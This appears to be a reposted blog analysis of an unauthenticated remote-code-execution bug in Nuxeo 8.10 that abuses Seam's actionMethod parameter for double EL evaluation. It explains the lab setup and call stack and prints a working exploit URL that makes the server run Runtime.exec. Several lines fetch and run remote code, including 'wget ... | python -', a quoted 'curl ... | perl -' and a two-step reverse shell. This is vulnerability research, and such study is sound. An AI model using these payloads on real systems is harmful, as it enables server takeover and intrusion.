[旧文系列] Nuxeo Unauthenticated RCE analysis

关于<旧文系列>

<旧文系列>系列是笔者将以前发到其他地方的技术文章，挑选其中一些值得保留的，迁移到当前博客来。

文章首发地址：hxxps://medium.com/@m01e/nuxeo-unauthenticated-rce-analysis-2f88d412e176

1、Preface

This time, The vulnerability to be analyzed comes from a Blackhat topic <Breaking Parser Logic! Take Your Path Normalization Off and Pop 0days Out> from Orange Tsai in 2018.

2、Set up the environment

First, I’ll use docker to set up the lab environment. According to Orange’s article, The unauthenticated RCE vulnerability in version 8.10 of Nuxeo.

So, download the docker image of Nuxeo 8

# docker pull nuxeo:8

Then, start the Nuxeo docker image. Theport 8080 is refer to Nuxeo http service, and 8787 is refer to remote debugging port of Nuxeo.

# docker run -itd -p38787:8787 -p30223:8080 nuxeo:8

Then, into the Nuxeo container and modify config file nuxue/server/bin/nuxeo.conf to enable remote debugging switch.

Then, install a component named nuxeo-jsf-ui , due to this component is related to exploit the vulnerability.

# nuxeo/server/bin/nuxeoctl mp-install nuxeo-jsf-ui

Finally, start the Nuxeo service and open browser to access it.

# nuxeo/server/bin/nuxeoctl start

And now, export the whole nuxeo project directory /opt/nuxeo/server in docker container to local machine.

Then import the whole nuxeo project directory into IDEA, and add all dependency jars in bin、lib、nxserver/bundles、nxserver/lib directories to current project.

Now, the lab environment set up finished.

3、Vulnerability analysis

In Nuxeo, there is a popular web framework, Seam framework. In order to control where browser should be redirected, Seam supports a series of HTTP parameter, and it is also buggy in these HTTP parameters… actionMethod is one of them.

actionMethod is a special parameter that can invoke specified JBoss EL(Expression Language) from query string. It seems dangerous but there are some preconditions before invocation. The detailed implementation can be found in method callAction .

In order to invoke JBoss EL, it must be satisfy three preconditions as below：

The value of actionMethod must be a pair of which looks like FILENAME:EL_CODE , and it mustn’t contain # and {


2. The FILENAME part must be a real file under root context:/opt/nuxeo/server/nxserver/nuxeo.war

3. The file FILENAME must have the content "#{EL_CODE}" in it (double quotes and are required)

For example, the file login.xhtmllocate in root context /opt/nuxeo/server/nxserver/nuxeo.war/ .


As screenshot shown above, you can eval EL via URL as below:

http://your-host/nuxeo/xxx.xhtml?actionMethod=login.xhtml:userDTO.username

Because of the three preconditions as mentioned above, it looks like no security risk to invoke EL. Because the fileFILENAMEcontent that you can’t control.

But, there is an interesting feature in actionMethod=FILENAME:EL_CODE , after EL_CODE is invoked, if the returned string looks like EL, then the EL will be invoked! In other words, We will execute arbitrary EL if we can control the returned string. Just like the code screenshot as below.

Here is the detailed call stack:
(1) callAction [Pages.java]
(2) handleOutcome [Pages.java]
(3) handleNavigation [FancyNavigationHandler.java]
(4) handleNavigation [SeamNavigationHandler.java]
(5) interpolateAndRedirect [FacesManager.java]
(6) interpolate [Interpolator.java]
(7) interpolateExpressions [Interpolator.java]
(8) createValueExpression [Expressions.java]

So you need to find a gadget that can satisfy preconditions methoned above.

Here I choice suggest_add_new_directory_entry_iframe.xhtml in wdigets directory in root context path.

4、Exploit

http://vulfocus.me:30223/nuxeo/create_file.xhtml?
actionMethod=widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')
&directoryNameForPopup=/?key=#
{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null),'wget http://192.168.3.2:8384/note.py')}

In addtion, I had uploaded the exploit that based on pocsuite3 framework to github. And the perform result like screenshot as below:

4.1 About Orange’s PoC

Maybe you’re confused if you read Orange’s PoC about this. His PoC shown as below.

First, why there is no /login.jsp;/..;/ in my PoC? Actually, to exploit this vulnerability , you don’t need to bypass ACL. Nuxeo will call callAction method to handle parameter actionMethodas long as which in URL.

But that way to bypass ACL opens my mind!

Secondly, in PoC, request.getAttribute('method')[15] refers to Runtime.getRuntime().exec(String cmd) method, if cmd='curl orange.tw/bc.pl | perl -' , the PoC won’t work! Because, in Java, the method Runtime.getRuntime().exec(String cmd) doesn’t support pipe command.

If you want to use pipe command to perform reverse shell, you should invoke the method Runtime.getRuntime().exec(String[] cmd). For example in Java:

String cmd[]= {"/bin/bash","-c","wget http://xxx/note.py | python -"};
Runtime.getRuntime().exec(cmd);

But I failed when I try to invoke Runtime.getRuntime().exec(String[] cmd) to exploit this vulnerability. Because the type of cmd is Array , and there will be {} symbol in PoC.

Temporarily I can’t solve this problem. So I exploit it to perform reverse shell with two steps:
(1) wget http://xxx/rshell.py
(2) python rshell.py

If you’re interesting with it, you can try to solve it.

Reference

[1] http://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html
[2] http://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf